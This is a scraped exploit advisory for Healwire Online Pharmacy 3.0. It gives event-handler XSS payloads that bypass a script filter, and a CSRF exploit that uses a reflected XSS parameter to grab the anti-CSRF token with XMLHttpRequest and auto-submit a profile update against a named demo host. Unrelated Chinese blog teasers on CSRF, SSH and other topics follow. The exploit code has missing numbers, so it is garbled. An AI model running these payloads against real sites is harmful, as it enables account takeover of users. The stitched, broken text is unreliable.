Healwire Online Pharmacy version 3.0 suffers from cross site request forgery and cross site scripting vulnerabilities.

tags | exploitvulnerabilityxsscsrf

MD5 | 9196695291014c0d67db9bdd80d678ff

# Exploit Title: Healwire Online Pharmacy 3.0 - Persistent Cross-Site Scripting / Cross-Site Request Forgery

# Date: --

# Exploit Author: L0RD

# Vendor Homepage: https://codecanyon.net/item/healwire-online-pharmacy/16423338?s_rank=1499

# Version: 3.0

# Tested on: windows

# POC  : Cross site scripting :

) Create an account and go to your profile.

) When we want to put "<script></script>" in the fields,"script" will be

replaced with null.

so we can bypass this filter by using javascript's events like

"onmouseover" or "oninput" .

Put one of these payloads into the fields :

 - " oninput=alert('xss') "

 - " onmouseover=alert('xss') "

) You will get an alert box inside the page . ( after put something into

the fields or move mouse on the fields)

# POC  : Cross-Site request forgery :

# With csrf vulnerability,attacker can easily change user's authentication.

# So in this script , we have anti-CSRF token .We can't change user's

# information without token.

# but there is a vulnerable parameter which has reflected xss in another page

# of this script.

# http://store.webandcrafts.com/demo/healwire/?msg= [We have Reflected XSS here]

# Now we can bypass anti-csrf by this parameter and using javascript:

# Exploit :

"/><form action="

http://store.webandcrafts.com/demo/healwire/user/update-details-user/1"

method="POST">

<input type="hidden" name="first_name" value="a" />

<input type="hidden" name="address"

value="" oninput=alert(document.domain) ""

/>

<input type="hidden" name="pincode" value="a" />

<input type="hidden" name="phone" value="" />

<input type="hidden" name="last_name" value="anything" />

<input type="hidden" name="_token" value="" />

</form>

<script>

var token = ' ';

var req = new XMLHttpRequest();

req.onreadystatechange = function(){

if(this.readyState ==  && this.status == ){

var secPage = this.responseXML;

token = secPage.forms[].elements[].value;

console.log(token);

}

}

req.open("GET","/demo/healwire/account-page",true);

req.responseType = "document";

req.send();

window.setTimeout(function(){

document.forms[].elements[].value = token;

document.forms[].submit();

},)

</script>

# You can also send  ajax requests instead of using form .

# Encode this payload and put this into "msg" parameter

# JSON result after  seconds :

status "SUCCESS"

msg "User profile updated !"

Healwire Online Pharmacy 3.0 Cross Site Request Forgery / Cross Site Scripting的更多相关文章

  1. WebGoat学习——跨站请求伪造(Cross Site Request Forgery (CSRF))

    跨站请求伪造(Cross Site Request Forgery (CSRF)) 跨站请求伪造(Cross Site Request Forgery (CSRF))也被称为:one click at ...

  2. Cross Site Request Forgery (CSRF)--spring security -转

    http://docs.spring.io/spring-security/site/docs/3.2.0.CI-SNAPSHOT/reference/html/csrf.html 13. Cross ...

  3. 跨站请求伪造(Cross Site Request Forgery (CSRF))

    跨站请求伪造(Cross Site Request Forgery (CSRF)) 跨站请求伪造(Cross Site Request Forgery (CSRF)) 跨站请求伪造(Cross Sit ...

  4. DVWA 黑客攻防演练(十四)CSRF 攻击 Cross Site Request Forgery

    这么多攻击中,CSRF 攻击,全称是 Cross Site Request Forgery,翻译过来是跨站请求伪造可谓是最防不胜防之一.比如删除一篇文章,添加一笔钱之类,如果开发者是没有考虑到会被 C ...

  5. CSRF(Cross Site Request Forgery, 跨站域请求伪造)

    CSRF(Cross Site Request Forgery, 跨站域请求伪造) CSRF 背景与介绍 CSRF(Cross Site Request Forgery, 跨站域请求伪造)是一种网络的 ...

  6. CSRF(Cross Site Request Forgery, 跨站请求伪造)

    一.CSRF 背景与介绍 CSRF(Cross Site Request Forgery, 跨站域请求伪造)是一种网络的攻击方式,它在 2007 年曾被列为互联网 20 大安全隐患之一.其他安全隐患, ...

  7. 转: CSRF(Cross Site Request Forgery 跨站域请求伪造) 背景与介绍

    from:  https://www.ibm.com/developerworks/cn/web/1102_niugang_csrf/   在 IBM Bluemix 云平台上开发并部署您的下一个应用 ...

  8. CSRF Laravel Cross Site Request Forgery protection¶

    Laravel 使得防止应用 遭到跨站请求伪造攻击变得简单. Laravel 自动为每一个被应用管理的有效用户会话生成一个 CSRF "令牌",该令牌用于验证授权用 户和发起请求者 ...

  9. Vulnerability: Cross Site Request Forgery (CSRF)

    CSRF跨站请求伪造 这是一种网络攻击方式,也被称为one-click attack或者session riding 攻击原理 CSRF攻击利用网站对于用户网页浏览器的信任,挟持用户当前已登陆的Web ...

随机推荐

  1. [ SSH框架 ] Hibernate框架学习之四(JPA)

    一.JPA概述以及它和Hibernate之间的关系 1.1.Hibernate 概述 JPA Java Persistence API,是EJB3规范中负责对象持久化的应用程序编程接口(ORM接口), ...

  2. CAN数据格式-ASC

    Vector工具录制的数据,一般有ASC和BLF两种格式,本文介绍ASC. 1. ASC定义 ASC(ASCII)即文本文件,数据已可视化的文本存储. 2.ASC查看 通常情况下,用记事本就可以打开. ...

  3. SQLServer中PRECISION和LENGTH,还有SCALE的区别

    总是搞不清楚,每次自己测试之后又忘记.故今天记录在案 CST_NAME输入大于5个字符或两个汉字加一个字符,报错String or binary data would be truncated.The ...

  4. mongodb查询语句

    左边是mongodb语句,右边是sql语句 db.users.find() select * from users db.users.find({"age" : 27}) sele ...

  5. Java自学教程视频

    BAT大咖助力 全面升级Android面试 BAT大牛亲授 基于ElasticSearch的搜房网实战 从天气项目看Spring Cloud微服务治理 Java企业级电商项目架构演进之路  Tomca ...

  6. C语言实现输出一组数字中的所有奇数

    /*第二题*/ #include<stdio.h> //输入186732468 //输出173 //输入12345677 //输出13577 main(){ ;//输入的数字,数字的长度 ...

  7. 表示一个文件的 File 类型

    从本篇文章开始,我们将开启对 Java IO 系统的学习,本质上就是对文件的读写操作,听上去简单,其实并不容易.Java 的 IO 系统一直在完善和改进,设计了大量的类,也只有理解了这些类型被设计出来 ...

  8. SpringBoot cache-control 配置静态资源缓存 (以及其中的思考经历)

    昨天在部署项目时遇到一个问题,因为服务要部署到外网使用,中间经过了较多的网络传输限制,而且要加载arcgis等较大的文件,所以在部署后,发现页面loading需要很长时间,而且刷新也要重新从服务器下载 ...

  9. Java多线程:线程间通信之volatile与sychronized

    由前文Java内存模型我们熟悉了Java的内存工作模式和线程间的交互规范,本篇从应用层面讲解Java线程间通信. Java为线程间通信提供了三个相关的关键字volatile, synchronized ...

  10. SSH密钥认证添加方法和一些实用配置

    更改SSH端口号 用账号密码进入主机 sudo nano /etc/ssh/sshd-config 再其中添加Port 22等或改变该条 添加公钥到主机 cd ~ sudo mkdir .ssh 此处 ...